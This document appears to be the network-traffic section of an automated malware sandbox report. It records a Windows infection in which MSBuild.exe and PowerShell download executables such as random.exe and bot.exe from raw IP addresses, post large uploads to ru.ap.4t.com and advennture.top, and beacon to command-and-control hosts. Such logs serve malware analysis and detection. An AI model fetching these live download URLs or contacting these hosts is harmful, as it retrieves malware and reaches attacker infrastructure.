GET https://th.bing.com/th?id=ORMS.2ad4add0ed16909bae4daa1d4a9a9228&pid=Wdp&w=268&h=140&qlt=90&c=1&rs=1&dpr=1&p=0

HTTP Request

GET https://th.bing.com/th?id=ORMS.78362a5711e9b19a5c5c6aa22aa6965b&pid=Wdp&w=612&h=304&qlt=90&c=1&rs=1&dpr=1&p=0

HTTP Request

GET https://th.bing.com/th?id=ORMS.7c3e460e44874b46826c6744d5f7f7c4&pid=Wdp&w=612&h=304&qlt=90&c=1&rs=1&dpr=1&p=0

HTTP Response

200

HTTP Request

GET https://www.bing.com/api/v1/mediation/tracking?adUnit=366128&auId=b29e91d5-661e-44ce-8e41-efb0ff7ec86c&bidId=15000&bidderId=4&cmExpId=LV3&impId=2&oAdUnit=366128&publisherId=17160724&rId=b3acb661-8e41-49d4-befd-940da5dba5fd&rlink=https%3A%2F%2Fwww.bing.com%2Faes%2Fc.gif%3FDI%3D0%26DIS%3DSB_15000-1%3F%26RG%3D524b78902f98498caa1deb9cee31abfd%26SNR%3D1%26GV%3D2%26med%3D10&rtype=miFeedbackURL&tagId=edgechrntp-peekriver-2&trafficGroup=zfa_hx_zretr_4&trafficSubGroup=ego

HTTP Request

GET https://www.bing.com/api/v1/mediation/tracking?adUnit=366128&auId=9befcc48-6741-4809-a908-6214786ea6db&bidId=15000&bidderId=4&cmExpId=LV3&impId=1&oAdUnit=366128&publisherId=17160724&rId=b3acb661-8e41-49d4-befd-940da5dba5fd&rlink=https%3A%2F%2Fwww.bing.com%2Faes%2Fc.gif%3FDI%3D0%26DIS%3DSB_15000-1%3F%26RG%3D33f5df1682b342a49c1c15df156c73ae%26SNR%3D1%26GV%3D2%26med%3D10&rtype=miFeedbackURL&tagId=edgechrntp-peekriver-1&trafficGroup=zfa_hx_zretr_4&trafficSubGroup=ego

HTTP Request

GET https://www.bing.com/th?id=OADD2.8108985455534_19YIAXH2M3UNS6XXWS&pid=21.2&c=17&roil=0.0955&roit=0.1612&roir=1&roib=1&w=300&h=157&dynsize=1&qlt=90

HTTP Request

GET https://www.bing.com/th?id=OADD2.7215967937586_1ZFJXEHCIAGO5IZ0JQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=300&h=157&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

303

HTTP Response

303

HTTP Request

GET https://www.bing.com/aes/c.gif?DI=0&DIS=SB_15000-1?&RG=524b78902f98498caa1deb9cee31abfd&SNR=1&GV=2&med=10

HTTP Request

GET https://www.bing.com/aes/c.gif?DI=0&DIS=SB_15000-1?&RG=33f5df1682b342a49c1c15df156c73ae&SNR=1&GV=2&med=10

HTTP Response

200

HTTP Response

200
95.101.143.219:443

th.bing.com

tls

msedge.exe

2.3kB
4.4kB
10
8
95.101.143.219:443

th.bing.com

tls

msedge.exe

2.4kB
500 B
8
5
95.101.143.219:443

th.bing.com

tls

msedge.exe

2.3kB
4.4kB
10
7
204.79.197.203:443

https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=720&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true

tls, http2

msedge.exe

9.1kB
98.3kB
60
85

HTTP Request

GET https://ntp.msn.com/edge/ntp?locale=en-US&title=New+tab&enableForceCache=true

HTTP Request

GET https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=720&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true

HTTP Response

200

HTTP Response

200
88.221.135.33:443

r.bing.com

tls

msedge.exe

2.2kB
4.9kB
8
8
88.221.135.33:443

r.bing.com

tls

msedge.exe

2.2kB
4.9kB
8
7
204.79.197.219:443

r.msftstatic.com

tls, http2

msedge.exe

2.9kB
7.2kB
10
12
204.79.197.219:443

r.msftstatic.com

tls, http2

msedge.exe

2.8kB
7.2kB
10
13
51.104.15.253:443

https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211837962&w=0&NoResponseBody=true

tls, http2

msedge.exe

62.8kB
9.8kB
61
39

HTTP Request

POST https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211835982&w=0&NoResponseBody=true

HTTP Request

POST https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211835984&w=0&NoResponseBody=true

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211837203&w=0&NoResponseBody=true

HTTP Request

POST https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211837962&w=0&NoResponseBody=true

HTTP Response

204

HTTP Response

204
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

12.5kB
645 B
18
8

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
150.171.27.11:443

https://edge.microsoft.com/entityextractiontemplates/api/v1/assets/find-assets?name=edge_hub_apps_manifest_gz&version=4.11.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362

tls, http2

msedge.exe

3.8kB
2.3kB
15
15

HTTP Request

GET https://edge.microsoft.com/entityextractiontemplates/api/v1/assets/find-assets?name=domains_config_gz&version=3.*.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362

HTTP Request

GET https://edge.microsoft.com/entityextractiontemplates/api/v1/assets/find-assets?name=arbitration_priority_list&version=24.*.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362

HTTP Request

GET https://edge.microsoft.com/entityextractiontemplates/api/v1/assets/find-assets?name=edge_hub_apps_manifest_gz&version=4.11.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362

HTTP Response

200

HTTP Response

200

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

432.5kB
7.7kB
321
178

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

136.9kB
2.3kB
108
50

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/mine/random.exe

http

powershell.exe

42.6kB
1.9MB
863
1369

HTTP Request

GET http://176.113.115.7/mine/random.exe

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/files/1781548144/2GF9eeb.bat

http

rapes.exe

53.2kB
1.5MB
1072
1069

HTTP Request

GET http://176.113.115.7/test/am_no.bat

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/1781548144/2GF9eeb.bat

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

7.8MB
90.6kB
5592
1979

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

1.5kB
2.8kB
10
7

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

1.5kB
2.1kB
10
7

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
104.21.25.9:443

https://advennture.top/GKsiio

tls, http

MSBuild.exe

3.2kB
5.8kB
14
14

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

1.6kB
565 B
9
6

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
104.21.25.9:443

https://advennture.top/GKsiio

tls, http

MSBuild.exe

2.1kB
4.7kB
10
10

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200
77.90.153.244:80

http://77.90.153.244/v7942.exe

http

futors.exe

22.4kB
668.9kB
485
484

HTTP Request

GET http://77.90.153.244/v7942.exe

HTTP Response

200
104.21.25.9:443

https://advennture.top/GKsiio

tls, http

MSBuild.exe

1.1kB
4.1kB
9
9

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200
88.99.125.82:443

ru.ap.4t.com

tls

1.5kB
518 B
8
5
88.99.125.82:443

ru.ap.4t.com

tls

1.5kB
518 B
8
5
149.154.167.99:443

t.me

tls

1.6kB
19.7kB
25
21
176.113.115.7:80

http://176.113.115.7/mine/random.exe

http

55.6kB
1.9MB
1034
1374

HTTP Request

GET http://176.113.115.7/mine/random.exe

HTTP Response

200
88.99.125.82:443

ru.ap.4t.com

tls

1.0kB
3.1kB
11
8
88.99.125.82:443

ru.ap.4t.com

tls

1.4kB
622 B
9
6
88.99.125.82:443

ru.ap.4t.com

tls

1.5kB
2.8kB
10
8
88.99.125.82:443

ru.ap.4t.com

tls

1.7kB
6.5kB
13
10
88.99.125.82:443

ru.ap.4t.com

tls

1.5kB
672 B
9
6
88.99.125.82:443

ru.ap.4t.com

tls

6.4kB
645 B
13
8
149.154.167.99:443

t.me

tls

1.0kB
19.5kB
15
20
104.21.32.1:443

cosmosyf.top

tls

3.2kB
5.7kB
14
14
88.99.125.82:443

ru.ap.4t.com

tls

1.7kB
565 B
9
6
88.99.125.82:443

ru.ap.4t.com

tls

227.2kB
4.3kB
177
99
104.21.32.1:443

cosmosyf.top

tls

2.1kB
4.6kB
10
10
104.21.32.1:443

cosmosyf.top

tls

1.1kB
4.6kB
9
9
88.99.125.82:443

ru.ap.4t.com

tls

58.0kB
1.3kB
50
24
104.21.74.51:443

smeltingt.run

tls

3.2kB
5.7kB
14
13
185.7.214.51:9080

http://185.7.214.51:9080/Bell_Setup16

http

86.0kB
2.2MB
1573
1572

HTTP Request

GET http://185.7.214.51:9080/Bell_Setup16

HTTP Response

200
127.0.0.1:9223

MSBuild.exe
127.0.0.1:9223

MSBuild.exe
176.160.157.96:5000

goku92ad.zapto.org

tls

901 B
2.4kB
10
7
88.99.125.82:443

ru.ap.4t.com

tls

191.9kB
4.1kB
150
80
104.21.74.51:443

smeltingt.run

tls

2.1kB
4.6kB
10
10
195.201.57.90:443

ipwho.is

tls

877 B
6.3kB
9
10
104.21.74.51:443

smeltingt.run

tls

1.1kB
4.6kB
9
9
142.250.180.4:443

www.google.com

tls

4.5kB
46.2kB
45
50
142.250.180.4:443

www.google.com

tls

2.2kB
6.7kB
10
9
142.250.180.4:443

www.google.com

tls

2.3kB
6.7kB
10
9
172.67.172.183:443

oreheatq.live

tls

3.2kB
5.8kB
14
14
172.217.16.238:443

clients2.google.com

tls

3.4kB
10.7kB
15
17
2.59.41.142:8080

http://2.59.41.142:8080/bot.exe

http

273.0kB
8.2MB
5860
5855

HTTP Request

GET http://2.59.41.142:8080/bot.exe

HTTP Response

200
142.250.200.1:443

clients2.googleusercontent.com

tls

6.2kB
176.6kB
83
133
172.67.172.183:443

oreheatq.live

tls

2.1kB
4.1kB
10
10
172.67.172.183:443

oreheatq.live

tls

1.1kB
4.6kB
9
9
172.217.169.46:443

play.google.com

tls

2.3kB
8.7kB
10
10
176.160.157.96:5000

goku92ad.zapto.org

tls

33.9kB
2.0kB
65
43
88.99.125.82:443

ru.ap.4t.com

tls

2.4kB
565 B
10
6
172.67.172.183:443

oreheatq.live

tls

3.2kB
5.8kB
14
14
88.99.125.82:443

ru.ap.4t.com

tls

1.7kB
565 B
9
6
172.67.172.183:443

oreheatq.live

tls

2.1kB
4.6kB
10
10
88.99.125.82:443

ru.ap.4t.com

tls

272.3kB
4.7kB
210
110
172.67.172.183:443

oreheatq.live

tls

1.1kB
4.6kB
9
9
176.113.115.7:80

http://176.113.115.7/files/5163778194/7IIl2eE.exe

http

43.6kB
1.3MB
909
908

HTTP Request

GET http://176.113.115.7/files/5163778194/7IIl2eE.exe

HTTP Response

200
88.99.125.82:443

ru.ap.4t.com

tls

80.5kB
1.3kB
66
24
88.99.125.82:443

ru.ap.4t.com

tls

322.9kB
4.0kB
243
92
204.79.197.203:443

ntp.msn.com

tls

2.8kB
6.5kB
12
10
150.171.27.11:80

http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:_mA7FwXY-53SkK7wPwpcLI65BW-vij58fuzibcLq1l8&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

http

883 B
1.1kB
5
5

HTTP Request

GET http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:_mA7FwXY-53SkK7wPwpcLI65BW-vij58fuzibcLq1l8&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

HTTP Response

200
172.217.16.238:443

clients2.google.com

tls

2.3kB
8.3kB
12
10
150.171.28.11:443

edge.microsoft.com

tls

2.3kB
6.3kB
11
8
172.217.16.238:443

clients2.google.com

tls

3.3kB
10.9kB
18
19
150.171.28.11:443

edge.microsoft.com

tls

3.9kB
9.6kB
16
21
204.79.197.203:443

ntp.msn.com

tls

5.9kB
65.4kB
46
64
142.250.200.1:443

clients2.googleusercontent.com

tls

6.3kB
176.6kB
84
133
95.101.143.218:443

copilot.microsoft.com

tls

2.9kB
5.5kB
15
17
2.18.190.174:443

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

tls

3.4kB
20.2kB
21
28
88.221.135.34:443

www.bing.com

tls

2.3kB
5.0kB
10
9
150.171.28.10:443

c.bing.com

tls

3.0kB
8.6kB
11
16
13.74.129.1:443

c.msn.com

tls

2.3kB
6.9kB
9
10
2.18.190.99:443

assets.msn.com

tls

2.3kB
5.1kB
10
11
2.18.190.99:443

assets.msn.com

tls

3.3kB
6.1kB
15
14
95.101.143.201:443

th.bing.com

tls

2.3kB
5.1kB
10
10
52.85.92.105:443

sb.scorecardresearch.com

tls

2.3kB
6.3kB
10
11
2.19.252.154:443

img-s-msn-com.akamaized.net

tls

2.3kB
4.3kB
11
11
2.18.190.99:443

assets.msn.com

tls

8.2kB
176.8kB
90
143
95.101.143.201:443

www.bing.com

tls

3.1kB
6.6kB
15
17
13.74.129.1:443

c.msn.com

tls

3.9kB
7.8kB
13
13
2.18.190.99:443

assets.msn.com

tls

2.6kB
867 B
9
7
20.42.73.31:443

browser.events.data.msn.com

tls

8.9kB
8.0kB
19
18
150.171.28.10:443

c.bing.com

tls

5.1kB
2.2kB
12
12
204.79.197.203:443

srtb.msn.com

tls

3.7kB
8.0kB
14
15
13.74.129.1:443

c.msn.com

tls

4.0kB
7.8kB
14
13
204.79.197.203:443

srtb.msn.com

tls

11.8kB
16.2kB
31
33
2.19.252.154:443

img-s-msn-com.akamaized.net

tls

4.3kB
9.2kB
24
26
95.101.143.201:443

th.bing.com

tls

7.1kB
164.0kB
80
128
88.221.135.34:443

www.bing.com

tls

7.3kB
38.4kB
43
47
88.221.135.34:443

www.bing.com

tls

2.2kB
4.4kB
8
8
95.101.143.201:443

th.bing.com

tls

2.3kB
4.4kB
10
7
95.101.143.201:443

th.bing.com

tls

2.5kB
851 B
9
7
88.221.135.34:443

www.bing.com

tls

2.6kB
827 B
9
6
104.21.25.9:443

advennture.top

tls

3.4kB
5.8kB
16
14
88.221.135.34:443

www.bing.com

tls

2.2kB
4.4kB
10
7
95.101.143.201:443

th.bing.com

tls

2.2kB
4.4kB
10
7
204.79.197.203:443

ntp.msn.com

tls

9.5kB
66.2kB
42
63
204.79.197.219:443

r.msftstatic.com

tls

2.9kB
7.2kB
10
13
204.79.197.219:443

r.msftstatic.com

tls

2.9kB
7.2kB
10
12
95.101.143.201:443

r.bing.com

tls

2.3kB
4.9kB
9
8
95.101.143.201:443

r.bing.com

tls

2.2kB
4.9kB
9
8
20.42.73.31:443

browser.events.data.msn.com

tls

46.3kB
9.3kB
49
33
20.42.73.31:443

browser.events.data.msn.com

tls

2.9kB
6.9kB
12
9
176.113.115.7:80

http://176.113.115.7/files/unique2/random.exe

http

341.4kB
9.6MB
6901
6894

HTTP Request

GET http://176.113.115.7/files/martin2/random.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/unique2/random.exe

HTTP Response

200
88.99.125.82:443

ru.ap.4t.com

tls

12.2kB
645 B
17
8
107.174.192.179:80

http://107.174.192.179/app/u75a1_003.exe

http

44.8kB
1.4MB
972
971

HTTP Request

GET http://107.174.192.179/app/u75a1_003.exe

HTTP Response

200
88.99.125.82:443

ru.ap.4t.com

tls

470.2kB
8.3kB
347
187
13.107.246.59:80

microsoft.com

236 B
132 B
5
3
142.250.187.195:80

http://c.pki.goog/r/r1.crl

http

476 B
393 B
6
4

HTTP Request

GET http://c.pki.goog/r/r1.crl

HTTP Response

304
104.21.25.9:443

advennture.top

tls

2.1kB
4.1kB
10
10
88.99.125.82:443

ru.ap.4t.com

tls

136.9kB
2.6kB
108
57
104.21.25.9:443

advennture.top

tls

1.1kB
4.6kB
9
9
52.101.40.26:25

microsoft-com.mail.protection.outlook.com

260 B
5
88.99.125.82:443

ru.ap.4t.com

tls

7.7MB
71.0kB
5526
1673
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
46.173.214.156:443

indro.top

https

355 B
582 B
5
6
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

420 B
356 B
9
8
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
107.174.192.179:80

http://107.174.192.179/clean

http

78.3kB
3.6MB
1601
2547

HTTP Request

GET http://107.174.192.179/data/003

HTTP Response

200

HTTP Request

GET http://107.174.192.179/clean

HTTP Response

200
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
185.7.214.57:480

10.4kB
574.9kB
219
424
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
88.99.125.82:443

ru.ap.4t.com

tls

1.5kB
2.8kB
10
7
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
88.99.125.82:443

ru.ap.4t.com

tls

1.5kB
2.1kB
10
7
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
88.99.125.82:443

ru.ap.4t.com

tls

2.0kB
565 B
10
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
185.7.214.57:480

2.4kB
991 B
13
16
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
176.113.115.7:80

http://176.113.115.7/files/7033027882/TbV75ZR.exe

http

35.4kB
1.0MB
759
758

HTTP Request

GET http://176.113.115.7/files/7033027882/TbV75ZR.exe

HTTP Response

200
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
82.29.67.160:443

208 B
4
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
185.7.214.57:480

2.1kB
911 B
11
14
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
104.26.8.202:443

grabify.link

tls

1.1kB
13.3kB
13
17
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

420 B
356 B
9
8
2.59.41.142:9090

gogo.fechrise.fun

420 B
356 B
9
8
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

374 B
316 B
8
7
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

334 B
224 B
7
5
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

334 B
224 B
7
5
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

374 B
264 B
8
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

374 B
264 B
8
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
224 B
7
5
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
185.7.214.57:480

2.1kB
911 B
11
14
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
276 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
185.7.214.57:480

2.1kB
911 B
11
14
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

328 B
264 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
264 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
264 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
264 B
7
6
185.7.214.57:480

2.1kB
911 B
11
14
2.59.41.142:9090

gogo.fechrise.fun

328 B
264 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
264 B
7
6
2.59.41.142:9090

gogo.fechrise.fun

328 B
264 B
7
6
185.7.214.57:480

2.1kB
911 B
11
14
185.7.214.57:480

2.1kB
911 B
11
14
185.7.214.57:480

2.1kB
911 B
11
14
185.7.214.57:480

2.1kB
911 B
11
14
2.59.41.142:9090

gogo.fechrise.fun

328 B
264 B
7
6
185.7.214.57:480

2.1kB
911 B
11
14
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
104.26.8.202:443

grabify.link

tls

1.0kB
13.3kB
12
16
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
88.99.125.82:443

ru.ap.4t.com

tls

108.4kB
1.4kB
87
28
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
185.7.214.57:480

2.1kB
911 B
11
14
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5
2.59.41.142:9090

gogo.fechrise.fun

282 B
224 B
6
5

8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

wxayfarer.live

dns

MSBuild.exe

60 B
128 B
1
1

DNS Request

wxayfarer.live
8.8.8.8:53

oreheatq.live

dns

